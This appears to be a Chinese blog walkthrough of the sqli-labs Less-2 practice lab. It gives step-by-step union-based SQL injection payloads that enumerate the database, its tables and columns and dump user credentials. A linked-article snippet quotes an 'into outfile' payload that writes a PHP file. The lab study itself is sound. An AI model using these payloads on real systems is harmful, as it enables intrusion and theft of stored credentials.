sqli-labs less-2

最新推荐文章于 2025-02-26 23:09:30 发布
原创 最新推荐文章于 2025-02-26 23:09:30 发布 · 346 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql

本文详细解析了SQL注入在labsless-2环境中的实例,通过输入验证展示了整数型注入点的存在,并逐步揭示了如何判断列数、定位显示位、获取数据库信息、查询表结构和具体内容。最后演示了如何利用这些信息进行安全风险评估和防范措施。

文章目录

sqli=labs less-2

*判断是否存在注入

输入?id=1 回显正常

在这里插入图片描述

输入?id=1' 回显错误

在这里插入图片描述

输入?id=1 and 1=1 回显正常

输入?id=1 and 1=2 回显错误

说明存在整数型注入点

页面未报错,查询结果为空,表明存在注入点,and查询被直接代入到了原查询语句中,可以直接在后面进行联合查询
(PS:因为本关是数字型注入,没有引号/括号的包裹,所以注入点更容易被发现)

* 判断列数

输入?id=1 order by 3 --+ 回显正常

输入?id=1 order by 4 --+ 回显错误

说明列数为3,有三个字段

* 报显示位

使用联合查询

输入?id=-1 and 1=2 union  select 1,2,3 --+

在这里插入图片描述

由图可知,显示位在2和3上

* 查询详细信息

接下来用database()和version()查询PHP版本和数据库名称

输入?id=-1 and 1=2 union select 1,database(),version() --+

在这里插入图片描述

由图可知,数据库名称为security,PHP版本为5.5.53

* 查询具体内容

* 查询security库下的表

输入?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' --+

在这里插入图片描述

由图可知,security库下有4个表

* 查询表中的列

输入?id=-1 union select 1, group_concat(column_name),3 from information_schema.columns where table_name = 'users' --+

在这里插入图片描述

* 输出最终查询到的信息

输入?id=-1  union select 1,username,password from users where id = 1 --+

………………

?id=-1  union select 1,username,password from users where id = 12 --+

从1-12都有内容

在这里插入图片描述

即完成

sqli-labs靶场第二关less-2
wanggonghanfei的博客
10-01 721
本次测试在虚拟机搭建靶场,从主机测试。
Sqli-Labs闯关—Less 2
weixin_39157582的博客
08-19 241
安装sqli-labs1、phpstudy安装1.1、Mysql中注释符有三种1.2、总结2、单引号1.1、1.2、新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 1、phpstudy安装 安装phpstudy2018 下
Sqli-labsLess-2
→_→
03-12 1446
Less-2 翻译:获取-基于错误-基于整数 欢迎Dhakkan 请输...
sql注入系列之Sqli-labs(less-2)
BetsyMyGirl的博客
11-30 1541
判断注入点 http://192.168.81.210/sqli/Less-2/?id=1’输入单引号发现出现了sql语句报错,可以知道单引号已经进入到数据库里执行了,语句类似于 select * from users where id =1' limit 0,1 因为正常的情况下,用户只能将搜索的参数传入到数据库里面进行查询,是不可能去修改查询语句的,上方的报错就是由于用户修改了查询的语句而引起的,将以上语句代入到自己的数据库里执行也是会报错的,因为多了一个单引号。 判断注入类型 输入1 and 1=1
SQLi Labs Less-1 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-19 1万+
SQLi第一关,sqllabs less-1,sqli-labs less1
sqli-labs Less-2
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-31 285
sqli-labs Less-21.判断注入类型2.测试字段数3.使用联合查询查看页面的显示位4.爆出数据库版本和当前数据库名5.爆出所有数据库6.爆出当前数据库所有表7.查询当前数据库users表所有字段8.查询数据 1.判断注入类型 index.php?id=1*1 index.php?id=1*2 测试得知为整形注入 2.测试字段数 index.php?id=1 order by 4#...
精选资源
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
精选资源
sqli-labs实验指导手册
11-17
2. **布尔型注入**(如less-2): - **基于页面反馈**:通过观察页面是否返回特定信息(如" You are in......")来判断注入成功与否。 3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
精选资源
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-LabsSQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
sqlilabsSQL注入)小白通基础通关笔记(专针对小白)(第二关Less-2
u013630181的博客
07-05 319
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=ut
less-2sqli-labs靶场第二关
未名编程
07-19 2767
网址 https://sqli.wmcoder.site/sqli-labs/Less-8/ 解法 传入id=1查看页面回显 https://sqli.wmcoder.site/sqli-labs/Less-2/?id=1
sqli-labs通关攻略【Less-1 Less-2 Less-3 Less-4】
qq_65379983的博客
02-26 2723
sqli-labs靶场搭建 sql注入基础练习 sqli靶场练习通关详解
sqli-labs练习之 Less-2
博客地址 www.sec0nd.top
06-06 327
sql基础操作 查库:select schema_name from information_schema. schemata; 查表:select table_name from information_schema.tables where table_schema=‘security’; 查列:select column_name from information_schema.columns where table_name=‘users’ 查字段:select username,password
sqli-labs Less-2解题思路
qq_35266419的博客
05-09 966
首先声明一下,我自己也是一名小白,或者你可以叫我“脚本小子”。只是喜欢这个东西就去钻研,有一点心得就发布出来与大家探讨,有问题请多多指教。末尾更精彩! Less-2 GET-Error based-intiger based ①打开页面,如图所示: ②[如图所示:please input the ID as parameter … ]此处id 传递参数,先测试是否存在漏洞 ③根据返回错误页面...
sqli-labs less2-7
sopora的博客
10-09 395
  LESS 2 基于整形数的注入 用id=’测试,发现报错,根据报错信息发现第二关的参数是整形,直接构造payload: http://localhost/sqli-labs-master/Less-2/?id=0 union select 1,group_concat(username),group_concat(password) from users%23 LESS 3 带括号...
Sqli-labsLess1-10
Mi1k7ea
04-14 4754
为了更好地学习SQL注入,便从sqli-labs开始入手吧。很多东西都是不懂,所以也是从各位前辈、大牛的博客以及书籍中去学习,将自己学到的都记录一下,以便以后的查看。同时也希望各位能够多多给点指导,让本人能够更好地掌握各种方法技巧等等。 为了更方便地实现操作,直接用Firefox的HackBar插件来操作~ Less1--基于错误的单引号字符型注入 直接在url中输入?id=1可以看
在线sqli-labs 通关大全 Less-2
qq_44985415的博客
08-29 625
sqli-labs (2) 励志语录 青年是学习智慧的时期,中年是付诸实践的时期。——卢梭 1.知识点 sql注入常见参数 user():当前数据库用户 database():当前数据库名 concat():联合数据,用于联合两条数据结果。如 concat(username,0x3a,password) group_concat():和 concat() 类似,如 group_concat(DISTINCT+user,0x3a,password),用于把多条数据一次注入出来 concat_ws():用
sqli-labs less8
最新发布
08-19
sqli-labs 平台的 Less-8 关卡是一个典型的布尔盲注(Boolean-based Blind SQL Injection)场景。该关卡没有明确的回显信息,攻击者需要通过页面返回的布尔状态(正常或异常)来判断注入语句是否执行成功,从而逐步...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿刁〇하

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值